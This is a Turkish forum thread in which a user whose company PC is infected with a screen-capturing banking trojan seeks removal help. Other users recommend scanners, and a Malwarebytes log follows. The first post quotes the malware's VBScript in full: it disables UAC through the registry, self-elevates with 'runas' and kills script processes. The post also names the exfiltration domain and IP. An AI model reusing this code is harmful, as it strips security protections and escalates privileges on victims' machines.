lostyazilim
tr.link

Virüsden Kurtulamıyorum ? Bankalara Giriş Yaptığımda Ekran Görüntüsünü Başkasına Yolluyor !

16 Mesajlar 3.609 Okunma
acebozum
tr.link

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)
Bilgisayarıma bir virüs bulaşmış yüksek ihtimalle crack üzerinden bir türlü silemiyorum.
Virüs şu şekilde çalışıyor örnek teb yada ykb bankasına girdim hemen ekrana numaranızı girin mobil bankacılık cebine insin yazıyor. Ayrıca ekranımın görüntüsü alıp kaydedip biryerlere gönderiyor.
Kaspersky ve Eset ile taradım görmüyorlar virüsü.

Şüphelendiğim dosyalar:
Aşağıdaki gibi bir .vbs dosya buldum.

Set WPDWPALEJO = WScript.CreateObject ("WScript.Shell")
Do
If MKEEMEATTP() Then
WPDWPALEJO.run "C:\Windows\System32\cmd.exe /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, True
Wscript.sleep(5000)
ATBBQPVZIL("wscript.exe")
End If
If not MKEEMEATTP() Then
PMTYQGOCGM()
End if
Wscript.sleep(5000)
loop
sub PMTYQGOCGM()
If WScript.Arguments.Length = 0 Then
Set DHJPTYBPTF = CreateObject("Shell.Application")
DHJPTYBPTF.ShellExecute "wscript.exe" _
, """" & WScript.ScriptFullName & """ RunAsAdministrator", , "runas", 1
End if
end sub
Function MKEEMEATTP()
MKEEMEATTP = False
On Error Resume Next
SSYKIAERJO = CreateObject("WScript.Shell").RegRead("HKEY_USERS\S-1-5-19\Environment\TEMP")
If err.number = 0 Then MKEEMEATTP = True
End Function
Sub ATBBQPVZIL(ITLZPQZMGF)
NTNCIKMSFZ = "."
Set UFTUPYHTAR = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & NTNCIKMSFZ & "\root\cimv2")
Set RWQNOEWCNB = UFTUPYHTAR.ExecQuery ("Select * from Win32_Process Where Name like '" & ITLZPQZMGF & "'")
For Each HIPQJQSESS in RWQNOEWCNB
HIPQJQSESS.Terminate
Next
End Sub


Ayrıca program svnhost.exe adıyla C:\Users\PC5\AppData\Local\Temp\ klasöründe gizli klasör açıp buradan başlıyor klasörler numaralı isimlendirilmiş ve birden fazla anladığım kadarıyla virüs anadosya göndermek yerine temp kopyasını oluşturup buradan başlıyor böylece temp silsem bile anadosya sonra kendini temp tekrar kopyalayıp başlamış oluyor.

svnhost.exe Dosya açıklamasında AutoIt v3 Script yazıyor bence bu makro bir yazılım bir komut var onu çalıştırıyor.

Bağlantılarını taradım. fflaslamarablog.xyz ve 64.4.10.33 gibi site ve iplere bilgi gönderiyor.

Bu virüsten format hariç nasıl kurtulabilirim.
 

 

elektronikssl
webimgo

Gerilim Gerilim www.giyse.com Kullanıcı
  • Üyelik 27.08.2011
  • Yaş/Cinsiyet 32 / E
  • Meslek Bilgi İşlem
  • Konum Çanakkale
  • Ad Soyad B** Ö**
  • Mesajlar 1923
  • Beğeniler 496 / 496
  • Ticaret 20, (%100)
Win7 ise combofix ile taratabilirsin.
Spyhunter 5 kullanabilirsin.
 

 

Giyse.com - Giyim Moda, Ayakkabı, Çanta ve Aksesuar Online Alışveriş

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)
combofix bulamadı




VirüsTotal Sonuçları:
https://www.virustotal.com/tr/file/8465f3fcbccce3ea12495edbb0bd09c3b066e3df891613ce3180f9bb38b37b01/analysis/1542011040/
 

 

PowerKing PowerKing Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 26.10.2018
  • Yaş/Cinsiyet 37 / E
  • Meslek Gamu™
  • Konum Ankara
  • Ad Soyad T** T**
  • Mesajlar 273
  • Beğeniler 14 / 76
  • Ticaret 0, (%0)
Dosyayı sıfırıyla değiştir :)
 

 

wmaraci
wmaraci

kuantumm kuantumm Asla Vazgeçmeyin ! Kullanıcı
  • Üyelik 10.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek ERP / CRM Consultant
  • Konum İstanbul Anadolu
  • Ad Soyad E** Ö**
  • Mesajlar 497
  • Beğeniler 102 / 139
  • Ticaret 11, (%100)
Merhaba
Malwarebytes ile taratabilirsiniz. Bu konularada en iyisidir. Taramadan önce Protection kısmından rootkit taramasını da aktif hale getirerek taramayı başlatırsanız daha etkili sonuç verecektir.
https://www.malwarebytes.com/mwb-download/thankyou/
alemburda

kişi bu mesajı beğendi.

Siz Hala PDF Katalog mu Kullanıyorsunuz? KatalogTR.com- Yeni Nesil Dijital Katalog Çözümleri

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)

PowerKing adlı üyeden alıntı

Dosyayı sıfırıyla değiştir :)


Temp bölümündeki klasörün içindeki dosyayı sıfır başka bir dosya ile değiştiriyorum ama her açılışta kendisine başka bir adda klasör ve içine virüsü koyup sonra programı açıyor.
Bildiğin program kaynak dosya gitmedikçe yedekli çalışıyor.
 

 

PowerKing PowerKing Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 26.10.2018
  • Yaş/Cinsiyet 37 / E
  • Meslek Gamu™
  • Konum Ankara
  • Ad Soyad T** T**
  • Mesajlar 273
  • Beğeniler 14 / 76
  • Ticaret 0, (%0)
Format at gitsin.
 

 

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)
şirket pc olduğundan kafama göre format atamıyorum hem atsam bile hayırdır diyecekler. Durumu anlatsam bintürlü şey düşünürler.
 

 

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)

kuantumm adlı üyeden alıntı

Merhaba
Malwarebytes ile taratabilirsiniz. Bu konularada en iyisidir. Taramadan önce Protection kısmından rootkit taramasını da aktif hale getirerek taramayı başlatırsanız daha etkili sonuç verecektir.
https://www.malwarebytes.com/mwb-download/thankyou/


allah razı olsun işe yaradı kökünü kuruttu.

şöyle sonuçlarıda paylaşayım işine yarayan çıkar.
Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 11/13/18
Scan Time: 9:32 AM
Log File: ee7d11b2-e70d-11e8-830d-00ff3ec9ade3.json

-Software Information-
Version: 3.6.1.2711
Components Version: 1.0.482
Update Package Version: 1.0.7817
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: PC5-Bilgisayar\PC5

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 221200
Threats Detected: 11
Threats Quarantined: 11
Time Elapsed: 11 min, 52 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 1
Trojan.Agent.LSA, HKU\S-1-5-21-455223614-2614349514-429051497-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|APPLE UPDATER, Quarantined, [6482], [246401],1.0.7817

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 10
Trojan.Agent.LSA, C:\USERS\PC5\APPDATA\ROAMING\APPLE_UPDATER\LSASSS.EXE, Quarantined, [6482], [246401],1.0.7817
Trojan.Agent.LSA, C:\USERS\PC5\APPDATA\ROAMING\APPLE_UPDATER\SAFE, Quarantined, [6482], [246401],1.0.7817
RiskWare.Agent, C:\USERS\PC5\DESKTOP\TNod User & Password Finder.lnk, Quarantined, [3926], [352776],1.0.7817
RiskWare.Agent, C:\PROGRAM FILES\ESET\TNODUP.EXE, Quarantined, [3926], [352776],1.0.7817
HackTool.FilePatch, C:\PROGRAM FILES\INTERNET DOWNLOAD MANAGER\IDM.6.X.X.UPDATE.11-PATCH-REIS.EXE, Quarantined, [7854], [281135],1.0.7817
Generic.Malware/Suspicious, C:\PROGRAM FILES\INTERNET DOWNLOAD MANAGER\PATCH.EXE, Quarantined, [0], [392686],1.0.7817
HackTool.FilePatch, C:\PROGRAM FILES\SUPERHIDEIP\XENOCODER.X.X-PATCH.EXE, Quarantined, [7854], [281135],1.0.7817
RiskWare.Tool.HCK, C:\PROGRAM FILES\WINRAR\KEYGEN.EXE, Quarantined, [7769], [65942],1.0.7817
RiskWare.Tool.HCK, C:\USERS\PC5\DOWNLOADS\WINRAR-5.50-TURKCE-WT.EXE, Quarantined, [7769], [65942],1.0.7817
Generic.Malware/Suspicious, C:\USERS\PC5\DOWNLOADS\SANDBOXIE.5.22.RAR, Quarantined, [0], [392686],1.0.7817

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)


benim tahminim LSASSS.EXE adındaki dosya sanırım kaynak ve apple_updater klasöründe bulunan.

https://www.virustotal.com/tr/file/3f97bd398e585c2291758a50c741bf5ada64e32dc1c62e24794fb18c584cc500/analysis/1421204916/
kuantumm

kişi bu mesajı beğendi.

alemburda alemburda Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 05.05.2016
  • Yaş/Cinsiyet 33 / E
  • Meslek IT - Enformasyon Teknolojileri
  • Konum İstanbul Avrupa
  • Ad Soyad O** K**
  • Mesajlar 1403
  • Beğeniler 151 / 352
  • Ticaret 1, (%100)
bu meret yine çıktı olacak iş değil.
 

 

Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al